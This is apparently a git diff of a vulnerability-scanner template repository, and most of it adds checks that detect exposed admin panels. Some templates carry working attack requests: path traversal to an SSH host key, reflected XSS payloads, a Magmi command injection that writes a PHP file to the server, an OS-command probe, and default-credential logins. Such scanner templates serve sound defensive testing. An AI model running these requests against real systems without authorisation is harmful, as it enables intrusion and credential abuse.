Connection: close
|
||||
Referer: http://{{Hostname}}
|
||||
|
||||
- |
|
||||
GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||
Host: {{Hostname}}:8060
|
||||
Accept: */*
|
||||
Cache-Control: max-age=0
|
||||
Connection: close
|
||||
Referer: http://{{Hostname}}:8060/
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2020-1943
|
||||
|
||||
info:
|
||||
name: Apache OFBiz Reflected XSS
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -20,7 +20,7 @@ requests:
|
|||
Content-type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||
- |
|
||||
POST /magmi/web/magmi_run.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
|
||||
requests:
|
||||
- payloads:
|
||||
data: "payloads/CVE-2020-6287.xml"
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
|
|
|
@ -14,16 +14,12 @@ info:
|
|||
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
- "8443"
|
||||
raw:
|
||||
- raw:
|
||||
- |
|
||||
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
||||
Host: {{Hostname}}:§port§
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -18,15 +18,12 @@ requests:
|
|||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
- "8080"
|
||||
|
||||
attack: sniper
|
||||
raw:
|
||||
- |
|
||||
POST /api/jsonws/invoke HTTP/1.1
|
||||
Host: {{Hostname}}:§port§
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
Content-Length: 4938
|
||||
Accept: */*
|
||||
|
|
|
@ -0,0 +1,22 @@
|
|||
id: activemq-default-login
|
||||
|
||||
info:
|
||||
name: Apache ActiveMQ Default Credentials
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin/'
|
||||
headers:
|
||||
Authorization: "Basic YWRtaW46YWRtaW4="
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Welcome to the Apache ActiveMQ Console of <b>'
|
||||
- '<h2>Broker</h2>'
|
||||
condition: and
|
||||
|
||||
# We could add a request condition block to only send this request if the
|
||||
# site response URL had activeMQ broker stuff in the source.
|
|
@ -0,0 +1,19 @@
|
|||
id: ambari-default-credentials
|
||||
|
||||
info:
|
||||
name: Apache Ambari Default Credentials
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
|
||||
headers:
|
||||
Authorization: "Basic YWRtaW46YWRtaW4="
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"Users" : {'
|
||||
- 'AMBARI.'
|
||||
condition: and
|
|
@ -0,0 +1,20 @@
|
|||
id: ofbiz-default-credentials
|
||||
|
||||
info:
|
||||
name: Apache OfBiz Default Credentials
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/control/login'
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ofbiz-pagination-template"
|
||||
- "<span>Powered by OFBiz</span>"
|
||||
condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: zabbix-default-credentials
|
||||
|
||||
info:
|
||||
name: Zabbix Default Credentials
|
||||
author: pd-team
|
||||
severity: critical
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/index.php'
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "zabbix.php?action=dashboard.view"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -2,7 +2,7 @@ id: cname-service-detector
|
|||
|
||||
info:
|
||||
name: 3rd party service checker
|
||||
author: bauthard
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
dns:
|
||||
|
|
|
@ -2,7 +2,7 @@ id: servfail-refused-hosts
|
|||
|
||||
info:
|
||||
name: Servfail Host Finder
|
||||
author: mzack9999
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
dns:
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
id: active-admin-exposure
|
||||
|
||||
info:
|
||||
name: ActiveAdmin Admin Dasboard Exposure
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin/login'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "active_admin_content"
|
||||
- "active_admin-"
|
||||
condition: and
|
|
@ -0,0 +1,17 @@
|
|||
id: activemq-panel
|
||||
|
||||
info:
|
||||
name: Apache ActiveMQ Exposure
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<h2>Welcome to the Apache ActiveMQ!</h2>'
|
||||
- '<title>Apache ActiveMQ</title>'
|
||||
condition: and
|
|
@ -0,0 +1,18 @@
|
|||
id: airflow-exposure
|
||||
|
||||
info:
|
||||
name: Apache Airflow Exposure / Unauthenticated Access
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
- '{{BaseURL}}/admin/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Airflow - DAGs</title>'
|
||||
- '<a href="https://github.com/apache/airflow">'
|
||||
condition: and
|
|
@ -0,0 +1,17 @@
|
|||
id: ambari-exposure
|
||||
|
||||
info:
|
||||
name: Apache Ambari Exposure / Unauthenticated Access
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Ambari</title>'
|
||||
- 'href="http://www.apache.org/licenses/LICENSE-2.0"'
|
||||
condition: and
|
|
@ -0,0 +1,17 @@
|
|||
id: ansible-tower-exposure
|
||||
|
||||
info:
|
||||
name: Ansible Tower Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Ansible Tower</title>"
|
||||
- "ansible-main-menu"
|
||||
condition: and
|
|
@ -1,4 +1,5 @@
|
|||
id: atlassian-crowd-panel
|
||||
|
||||
info:
|
||||
name: Atlassian Crowd panel detect
|
||||
author: organiccrap
|
|
@ -2,7 +2,7 @@ id: citrix-vpn-detect
|
|||
|
||||
info:
|
||||
name: Citrix VPN Detection
|
||||
author: bauthard
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
requests:
|
|
@ -0,0 +1,18 @@
|
|||
id: couchdb-exposure
|
||||
|
||||
info:
|
||||
name: Apache CouchDB Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_all_dbs'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- CouchDB/
|
||||
- Erlang OTP/
|
||||
part: header
|
||||
condition: and
|
|
@ -0,0 +1,15 @@
|
|||
id: couchdb-fauxton
|
||||
|
||||
info:
|
||||
name: Apache CouchDB Fauxton Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Project Fauxton</title>'
|
|
@ -0,0 +1,17 @@
|
|||
id: django-admin-panel
|
||||
|
||||
info:
|
||||
name: Python Django Admin Panel
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/login/?next=/admin/"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<a href=\"/admin/\">Django administration</a>"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,17 @@
|
|||
id: druid-console-exposure
|
||||
|
||||
info:
|
||||
name: Alibaba Druid Console Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'src="/druid.js"'
|
||||
- 'href="/druid.css"'
|
||||
condition: and
|
|
@ -0,0 +1,15 @@
|
|||
id: exposed-pagespeed-global-admin
|
||||
|
||||
info:
|
||||
name: Apache PageSpeed Global Admin Dashboard Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/pagespeed_admin/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<b>Pagespeed Admin</b>"
|
|
@ -0,0 +1,17 @@
|
|||
id: exposed-webalizer
|
||||
|
||||
info:
|
||||
name: Publicly exposed Webalizer Interface
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webalizer/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Webalizer Version"
|
||||
- "Usage statistics for"
|
||||
condition: and
|
|
@ -0,0 +1,15 @@
|
|||
id: flink-exposure
|
||||
|
||||
info:
|
||||
name: Apache Flink Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Apache Flink Web Dashboard</title>'
|
|
@ -0,0 +1,15 @@
|
|||
id: hadoop-exposure
|
||||
|
||||
info:
|
||||
name: Apache Hadoop Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/dfshealth.html'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<div class="navbar-brand">Hadoop</div>'
|
|
@ -0,0 +1,15 @@
|
|||
id: kafka-connect-ui
|
||||
|
||||
info:
|
||||
name: Apache Kafka Connect UI Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Kafka Connect UI</title>'
|
|
@ -0,0 +1,16 @@
|
|||
id: kafka-monitoring
|
||||
|
||||
info:
|
||||
name: Apache Kafka Monitor Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '>KafkaMonitor</a>'
|
||||
- '>Kafka Monitor GUI</h1>'
|
|
@ -0,0 +1,15 @@
|
|||
id: kafka-topics-ui
|
||||
|
||||
info:
|
||||
name: Apache Kafka Topics UI Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Kafka Topics UI - Browse Kafka Data</title>'
|
|
@ -0,0 +1,15 @@
|
|||
id: kubernetes-dashboard
|
||||
|
||||
info:
|
||||
name: Kubernetes Console Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Kubernetes Dashboard</title>"
|
|
@ -2,7 +2,7 @@ id: parallels-html-client
|
|||
|
||||
info:
|
||||
name: Parallels HTML5 Client
|
||||
author: bauthard
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
requests:
|
|
@ -2,7 +2,7 @@ id: phpmyadmin-panel
|
|||
|
||||
info:
|
||||
name: phpMyAdmin Panel
|
||||
author: bauthard
|
||||
author: pd-team
|
||||
severity: info
|
||||
|
||||
requests:
|
|
@ -0,0 +1,15 @@
|
|||
id: rocketmq-console-exposure
|
||||
|
||||
info:
|
||||
name: Apache RocketMQ Console Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>RocketMq-console-ng</title>"
|
|
@ -0,0 +1,17 @@
|
|||
id: selenoid-ui-exposure
|
||||
|
||||
info:
|
||||
name: Selenoid UI Dashboard Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin/login'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Selenoid UI</title>"
|
||||
- "/manifest.json"
|
||||
condition: and
|
|
@ -0,0 +1,20 @@
|
|||
id: setup-page-exposure
|
||||
|
||||
info:
|
||||
name: Zenphoto Setup Page Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zp/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- Welcome to Zenphoto! This page will set up Zenphoto
|
||||
part: body
|
|
@ -0,0 +1,15 @@
|
|||
id: solr-exposure
|
||||
|
||||
info:
|
||||
name: Apache Solr Exposure
|
||||
author: pd-team
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/solr/'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Solr Admin</title>"
|
|
@ -10,7 +10,6 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}/webmin/"
|
||||
- "{{BaseURL}}:10000/"
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: word
|
|
@ -0,0 +1,18 @@
|
|||
id: yarn-manager-exposure
|
||||
|
||||
info:
|
||||
name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/cluster/cluster'
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'hadoop'
|
||||
- 'resourcemanager'
|
||||
- 'logged in as: dr.who'
|
||||
condition: and
|
|
@ -0,0 +1,17 @@
|
|||
id: zipkin-exposure
|
||||
|
||||
info:
|
||||
name: Zipkin Exposure
|
||||
author: pd-team
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}/zipkin/"
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "webpackJsonpzipkin-lens"
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue